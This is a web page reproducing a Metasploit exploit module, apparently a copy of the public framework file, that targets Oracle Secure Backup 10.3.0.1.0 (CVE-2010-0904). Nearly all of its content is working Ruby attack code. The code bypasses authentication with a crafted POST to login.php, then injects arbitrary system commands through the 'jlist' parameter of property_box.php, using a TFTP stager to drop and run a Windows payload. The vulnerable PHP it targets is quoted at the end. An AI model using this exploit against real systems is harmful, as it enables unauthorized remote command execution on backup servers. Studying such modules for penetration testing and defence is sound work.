扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 |
## # $Id: osb_uname_jlist.rb 13591 2011-08-19 18:35:29Z mc $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability', 'Description'=> %q{ This module exploits an authentication bypass vulnerability in login.php. In conjuction with the authentication bypass issue, the 'jlist' parameter in property_box.php can be used to execute arbitrary system commands. This module was tested against Oracle Secure Backup version 10.3.0.1.0 }, 'Author' => [ 'MC' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 13591 $', 'References' => [ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ], [ 'CVE', '2010-0904' ], # the jlist vector has not been disclosed or has it? ], 'Targets' => [ [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ] ], 'Privileged' => 'true', 'Platform' => 'win', 'DisclosureDate' => 'Jul 13 2010', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ]) ], self.class) end def windows_stager exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe" print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") execute_cmdstager({ :temp => '.'}) @payload_exe = payload_exe print_status("Attempting to execute the payload...") execute_command(@payload_exe) end def execute_command(cmd, opts = {}) res = send_request_cgi( { 'uri' =>'/login.php', 'data'=>'attempt=1&uname=-', 'method' => 'POST', }, 5) if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i)) sessionid = res.headers['Set-Cookie'].split(';')[0] data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd) send_request_raw( { 'uri' => '/property_box.php' + data, 'cookie' => sessionid, 'method' => 'GET', }, 5) else print_error("Invalid PHPSESSION token..") return end end def exploit if not datastore['CMD'].empty? print_status("Executing command '#{datastore['CMD']}'") execute_command(datastore['CMD']) return end case target['Platform'] when 'win' windows_stager else raise RuntimeError, 'Target not supported.' end handler end end __END__ else if (strcmp($type, "Job") == 0) { if (!is_array($objectname)) $objectname = array(); reset($objectname); while (list(,$oname) = each($objectname)) { $oname = escapeshellarg($oname); $jlist = "$jlist $oname"; } if (strlen($jlist) > 0) $msg = exec_qr("$rbtool lsjob -lrRLC $jlist"); |
体验盒子
